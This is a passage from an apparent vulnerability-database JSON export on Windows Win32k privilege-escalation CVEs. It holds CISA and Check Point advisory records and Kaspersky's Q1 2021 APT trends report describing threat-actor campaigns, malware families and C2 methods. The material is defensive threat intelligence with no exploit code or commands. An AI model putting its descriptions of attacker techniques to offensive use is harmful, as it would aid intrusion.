"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-04T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-02-04T00:00:00", "id": "CISA-KEV-CVE-2022-21882", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows Win32k Privilege Escalation Vulnerability. This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1732", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-02-10T00:00:00", "description": "CISA has added one new vulnerability to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \n[CVE-2022-21882](<https://nvd.nist.gov/vuln/detail/CVE-2022-21882>) | Microsoft Win32k Privilege Escalation Vulnerability | 02/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-04T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-02-04T00:00:00", "id": "CISA:63CCB4AC4FF75E87DC5BBA1121FC4501", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-08T18:38:38", "description": "Microsoft has released a security advisory to address an escalation of privileges vulnerability, [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), in Microsoft Win32k. A local attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1732 and apply the necessary patch to Windows 10 and Windows 2019 servers.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "cisa", "title": "Microsoft Warns of Windows Win32k Privilege Escalation", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CISA:911DE59572B6EF78B42DD868D622F637", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:39", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Win32k Elevation of Privilege (CVE-2022-21882)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-01-11T00:00:00", "id": "CPAI-2022-0007", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:15", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-1732)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CPAI-2021-0032", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-04-27T12:27:51", "description": "\n\nFor four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q1 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company&#x27;s Orion IT, a solution for monitoring and managing customers&#x27; IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation. Further investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group. The shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called &quot;limited and targeted attacks&quot;. At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity&#x27;s telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. Prior to the posts, on February 28, we identified related exploitation on less than a dozen Exchange systems; we also found more than a dozen Exchange artefacts indicating exploitation uploaded to multi-scanner services. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits are now available to multiple groups.\n\nWe have also discovered a campaign active since mid-March targeting governmental entities in the Russian Federation, using the aforementioned Exchange zero-day exploits. This campaign made use of a previously unknown malware family we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\n## Europe\n\nDuring routine monitoring of detections for FinFisher spyware tools, we discovered traces that point to recent FinFly Web deployments. In particular, we discovered two servers with web applications that we suspect, with high confidence, were generated using FinFly Web. FinFly Web is, in essence, a suite of tools and packages that implement a web-based exploitation server. It was first publicly documented in 2014, in the aftermath of the Gamma Group hacking incident. One of the suspected FinFly Web servers was active for more than a year between October 2019 and December 2020. This server was disabled a day after our discovery last December. Nevertheless, we were able to capture a copy of its landing page, which included JavaScript used to profile victims using what appears to be previously unknown code. In the second case, the server hosting FinFly Web was already offline at the moment of discovery, so we drew our conclusions using available historical data. As it turned out, it was active for a very short time around September 2020 on a host that appears to have been impersonating the popular Mail.ru service. Surprisingly, this server began answering queries again on January 12. So far, we haven&#x27;t seen any related payloads being dropped by these web pages.\n\n## Russian-speaking activity\n\nKazuar is a .NET backdoor usually associated with the Turla threat actor (aka Snake and Uroboros). Recently, Kazuar received renewed interest due to its similarities with the Sunburst backdoor. Although the capabilities of Kazuar have already been exposed in public research, many interesting facts about this backdoor were not made public. Our latest reports focus on the changes the threat actor made to the September and November versions of its backdoor.\n\nOn February 24, the National Security Defense Council of Ukraine (NSDC) publicly warned that a threat actor had exploited a national documents circulation system (SEI EB) to distribute malicious documents to Ukrainian public authorities. The alert contained a few related network IoCs, and specified that the documents used malicious macros in order to drop an implant onto targeted systems. Thanks to the shared IoCs, we were able to attribute this attack, with high confidence, to the Gamaredon threat actor. The malicious server IP mentioned by the NSDC has been known to Kaspersky since February as Gamaredon infrastructure.\n\nOn January 27, the French national cybersecurity agency (ANSSI) published a report describing an attack campaign that targeted publicly exposed and obsolete Centreon systems between 2017 and 2020, in order to deploy Fobushell (aka P.A.S.) webshells and Exaramel implants. ANSSI associated the campaign with the Sandworm intrusion-set, which we refer to as Hades. Although we specifically looked for additional compromised Centreon systems, Exaramel implant samples or associated infrastructure, we were unable to retrieve any useful artifacts from which we could initiate a comprehensive investigation. However, we did identify three Centreon servers where a Fobushell webshell had been deployed. One of those Fobushell samples was identical to another we previously identified on a Zebrocy C2 server.\n\n## Chinese-speaking activity\n\nWe discovered a set of malicious activities, which we named EdwardsPheasant, targeting mainly government organizations in Vietnam since June 2020. The attackers leverage previously unknown and obfuscated backdoors and loaders. The activities peaked in November 2020, but are still ongoing. The associated threat actor continues to leverage its tools and tactics (described in our private report) to compromise targets or maintain access in their networks. While we could identify similarities with the tools and tactics associated with Cycldek (aka Goblin Panda) and Lucky Mouse (aka Emissary Panda), we have been unable to attribute this set of activities to either of them conclusively.\n\nWe investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our [public report](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Middle East\n\nWe recently came across previously unknown malicious artifacts that we attributed to the Lyceum/Hexane threat group, showing that the attackers behind it are still active and have been developing their toolset during the last year. Although Lyceum still prefers taking advantage of DNS tunneling, it appears to have replaced the previously documented .NET payload with a new C++ backdoor and a PowerShell script that serve the same purpose. Our telemetry revealed that the threat group&#x27;s latest endeavors are focused on going after entities within one country \u2013 Tunisia. The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies. Based on the targeted industries, we assume that the attackers may have been interested in compromising these entities to track the movements and communications of individuals that are of interest to them. This could mean that the latest Lyceum cluster has an operational focus on targeting Tunisia, or that it is a subset of broader activity that is yet to be discovered.\n\nOn November 19, 2020, Shadow Chaser Group tweeted about a suspected MuddyWater APT malicious document potentially targeting a university in the United Arab Emirates. Based on our analysis since then, we suspect this intrusion is part of a campaign that started at least in early October 2020 and was last seen active in late December 2020. The threat actor relied on VBS-based malware to infect organizations from government, NGO and education sectors. Our telemetry, however, indicates that no further tools were deployed and we do not believe that data theft took place either. This indicates to us that the attackers are currently in the reconnaissance phase of their operation, and we expect subsequent waves of attacks to follow in the near future. In our private report, we provide an in-depth analysis of the malicious documents used by this threat actor and study their similarities to known MuddyWater tooling. The infrastructure setup and communications scheme are also similar to past incidents attributed to this group. The actor maintains a small set of first-stage C2 servers to connect back from the VBS implant for initial communications. Initial reconnaissance is performed by the actor and communication with the implant is handed off to a second-stage C2 for additional downloads. Finally, we present similarities with known TTPs of the MuddyWater group and attribute this campaign to them with medium confidence.\n\nDomestic Kitten is a threat group mainly known for its mobile backdoors. The group&#x27;s operations were exposed in 2018, showing that it was conducting surveillance attacks against individuals in the Middle East. The threat group targeted Android users by sending them popular and well-known applications that were backdoored and contained malicious code. Many of the applications had religious or political themes and were intended for Farsi, Arabic and Kurdish speakers, possibly alluding to this attack&#x27;s main targets. We have discovered new evidence showing that Domestic Kitten has been using PE executables to target victims using Windows since at least 2013, with some evidence that it goes back to 2011. The Windows version, which, to the best of our knowledge, has not been described in the past, was delivered in several versions, with the more recent one used for at least three and a half years to target individuals in parallel to the group&#x27;s mobile campaigns. The implant functionality and infrastructure in that version have remained the same all along, and have been used in the group&#x27;s activity witnessed this year.\n\nFerocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar and, to the best of our knowledge, has not been covered by security researchers. It only recently attracted attention when a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. We have been able to expand some of the findings on the group and provide insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities as well as the ability to execute arbitrary commands on the victim&#x27;s machine. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point. In our private report, we expand the details on these findings as well as provide analysis and mechanics of the MarkiRAT malware.\n\nKarkadann is a threat actor that has been targeting government bodies and news outlets in the Middle East since at least October 2020. The threat actor leverages tailor-made malicious documents with embedded macros that trigger an infection chain, opening a URL in Internet Explorer. The minimal functionality present in the macros and the browser specification suggest that the threat actor might be exploiting a privilege-escalation vulnerability in Internet Explorer. Despite the small amount of evidence available for analysis in the Karkadann case, we were able to find several similarities to the Piwiks case, a watering-hole attack we discovered that targeted multiple prominent websites in the Middle East. Our private report presents the recent Karkadann campaigns and the similarities between this campaign and the Piwiks case. The report concludes with some infrastructure overlaps with unattributed clusters that we have seen since last year that are potentially linked to the same threat actor.\n\n## Southeast Asia and Korean Peninsula\n\nWe discovered that the Kimsuky group adopted a new method to deliver its malware in its latest campaign on a South Korean stock trading application. In this campaign, beginning in December 2020, the group compromised a website belonging to the vendor of stock trading software, replacing the hosted installation package with a malicious one. Kimsuky also delivered its malware by utilizing a malicious Hangul (HWP) document containing COVID-19-related bait that discusses a government relief fund. Both infection vectors ultimately deliver the Quasar RAT. Compared to Kimsuky&#x27;s last reported infection chain, composed of various scripts, the new scheme adds complications and introduces less popular file types, involving VBS scripts, XML and Extensible Stylesheet Language (XSL) files with embedded C# code in order to fetch and execute stagers and payloads. Based on the lure document and characteristics of the compromised installation package, we conclude that this attack is financially motivated, which, as we have previously reported, is one of Kimsuky&#x27;s main focus areas.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a North Korean-related threat actor had targeted security researchers. According to Google TAG&#x27;s blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog and installed a Chrome exploit. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We can confirm that several infrastructures on the blog overlap with our previously published reporting about Lazarus group&#x27;s ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data, analyzing logs and files present on the servers. We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research. You can read our public report [here](<https://securelist.com/lazarus-threatneedle/100803/>).\n\nFollowing up our previous investigation into Lazarus attacks on the defense industry using ThreatNeedle, we discovered another malware cluster named CookieTime used in a campaign mainly focused on the defense industry. We detected activity in September and November 2020, with samples dating back to April 2020. Compared to the already known malware clusters of the Lazarus group, CookieTime shows a different structure and functionality. This malware communicates with the C2 server using the HTTP protocol. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. The C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results. We had a chance to look into the command and control script as a result of working closely with a local CERT to take down the threat actor&#x27;s infrastructure. The malware control servers are configured in a multi-stage fashion and only deliver the command file to valuable hosts.\n\nWhile investigating the artifacts of a supply-chain attack on the Vietnam Government Certification Authority&#x27;s (VGCA) website, we discovered that the first Trojanized package dates to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins deployed using PhantomNet malware, which was delivered using Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware. In our private report, we offer a detailed description for each post-compromise tool used in the attack, as well as other tools belonging to the actor&#x27;s arsenal. Finally, we also explore CoughingDown attribution in the light of recent discoveries.\n\nOn February 10, DBAPPSecurity published details about a zero-day exploit they discovered last December. Aside from the details of the exploit itself, researchers also mentioned it being used in the wild by BitterAPT. While no such subsequent information was given in the initial report to explain the attribution claims, our investigation into this activity confirms the exploit was in fact being used exclusively by this actor. We assigned the name TurtlePower to the campaign that makes use of this exploit, along with the other tools used to target governmental and telecom entities in Pakistan and China. We have also confidently linked the origin of this exploit to a broker we refer to as Moses. Moses has been responsible for the development of at least five exploits patched in the last two years. We have also been able to tie the usage of some of these exploits to at least two different actors thus far \u2013 BitterAPT and DarkHotel. At this time, it is unclear how these threat actors are obtaining exploits from Moses, whether it is through direct purchase or another third-party provider. During the TurtlePower campaign, BitterAPT used a wide array of tools on its victims to include a stage one payload named ArtraDownloader, a stage two payload named Splinter, a keylogger named SourLogger, an infostealer named SourFilling, as well as variations of Mimikatz to gather specific files and maintain its access. This particular campaign also appears to be narrowly focused on targets within Pakistan and China (based on the initial report referenced). While we can verify specific targeting within Pakistan using our own data, we have not been able to do the same regarding China. Use of CVE-2021-1732 peaked between June and July 2020, but the overall campaign is still ongoing.\n\nIn 2020, we observed new waves of attacks related to Dropping Elephant (aka Patchwork, Chinastrats), focusing on targets in China and Pakistan. We also noted a few targets outside of the group&#x27;s traditional area of operations, namely in the Middle East, and a growing interest in the African continent. The attacks followed the group&#x27;s well-established TTPs, which include the use of malicious documents crafted to exploit a remote code execution vulnerability in Microsoft Office, and the signature JakyllHyde (aka BadNews) Trojan in the later infection stages. Dropping Elephant introduced a new loader for JakyllHyde, a tool we named Crypta. It contains mechanisms to hinder detection and appears to be a core component of this APT actor&#x27;s recent toolset. Crypta and its variants have been observed in multiple scenarios loading a wide range of subsequent payloads, such as Bozok RAT, Quasar RAT and LokiBot. An additional Trojan discovered during our research was PubFantacy. To our knowledge, this tool has never been publicly described and has been used to target Windows servers since at least 2018.\n\nWe recently discovered a previously publicly unknown Android implant used in 2018-2019 by the SideWinder threat group, which we dubbed BroStealer. The main purpose of the BroStealer implant is to collect sensitive information from a victim&#x27;s device, such as photos, SMS messages, call recordings and files from various messaging applications. Although SideWinder has numerous campaigns against victims using the Windows platform, recent reports have shown that this threat group also goes after its targets via the mobile platform.\n\n## Other interesting discoveries\n\nIn February 2019, multiple antivirus companies received a collection of malware samples, most of them associated with various known APT groups. Some of the samples cannot be associated with any known activity. Some, in particular, attracted our attention due to their sophistication. The samples were compiled in 2014 and, accordingly, were likely deployed in 2014 and possibly as late as 2015. Although we have not found any shared code with any other known malware, the samples have intersections of coding patterns, style and techniques that have been seen in various [Lambert families](<https://securelist.com/unraveling-the-lamberts-toolkit/77990/>). We therefore named this malware Purple Lambert. Purple Lambert is composed of several modules, with its network module passively listening for a magic packet. It is capable of providing an attacker with basic information about the infected system and executing a received payload. Its functionality reminds us of Gray Lambert, another user-mode passive listener. Gray Lambert turned out to be a replacement of the kernel-mode passive-listener White Lambert implant in multiple incidents. In addition, Purple Lambert implements functionality similar to, but in different ways, both Gray Lambert and White Lambert. Our report, available to subscribers of our APT threat reports, includes discussion of both the passive-listener payload and the loader functionality included in the main module.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual&#x27;s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we&#x27;ve seen in Q1 2021:\n\n * Perhaps the most predominant attack we researched in this quarter was the SolarWinds attack. SolarWinds showed once again how successful a supply-chain attack can be, especially where attackers go the extra mile to remain hidden and maintain persistence in a target network. The scope of this attack is still being investigated as more zero-day flaws are discovered in SolarWinds products.\n * Another critical wave of attacks was the exploitation of Microsoft Exchange zero-day vulnerabilities by multiple threat actors. We recently discovered another campaign using these exploits with different targeting, possibly related to the same cluster of activities already reported.\n * Lazarus group&#x27;s bold campaign targeting security researchers worldwide also utilized zero-day vulnerabilities in browsers to compromise their targets. Their campaigns used themes centered on the use of zero-days to lure relevant researchers, possibly in an attempt to steal vulnerability research.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2021-04-27T10:00:26", "type": "securelist", "title": "APT trends report Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-04-27T10:00:26", "id": "SECURELIST:A10F281EF99381636376D6F6C6501E22", "href": "https://securelist.com/apt-trends-report-q1-2021/101967/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-29T16:18:40", "description": "\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) to this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren&#x27;t able to capture a full chain, so we don&#x27;t know if the exploit is used with another browser zero-day, or coupled with known, patched 